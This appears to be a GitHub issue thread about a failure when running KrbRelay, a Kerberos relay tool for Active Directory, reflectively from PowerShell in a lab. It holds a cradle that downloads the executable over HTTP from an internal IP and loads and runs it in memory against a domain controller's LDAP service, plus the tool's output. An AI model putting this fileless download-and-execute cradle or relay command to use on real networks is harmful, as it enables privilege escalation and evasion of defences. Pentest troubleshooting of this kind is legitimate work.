Open codeitch opened 1 year ago
While being able to successfully run KrbRelay.exe in my lab, it seems I cannot get a proper apReq when running the very same executable reflectively as in:
function KrbRelay{
    $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.49.76/KrbRelay.exe')
    $assem = [System.Reflection.Assembly]::Load($data)
    [KrbRelay.Program]::main([string[]]$args)
};KrbRelay -spn ldap/dc01.prod.domain.com -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -session 2 -console
...giving me the output as follows:
[*] Relaying context: PROD\user
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[*] Register com server objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAjgIfpxuBQndWJ0pjWjfYvA7AAADwN//8sy3o0GiUwWyIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing cross-session authentication
[*] Using CLSID: 90f18417-f0f1-484e-9d3c-59dceee5dbd8
[*] Spawning in session 2
[-] Recieved invalid apReq, exploit will fail
05000b0710000000da00320002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2040004002e00000006000600280000000a00ba470000000f434c49454e5450524f44
Is there perhaps any reason for this inconsistency that I might be missing?
Same issue here. Seems it is a CoInitializeSecurity problem. Please refer to the link below. https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/kerberos/kerberos-relay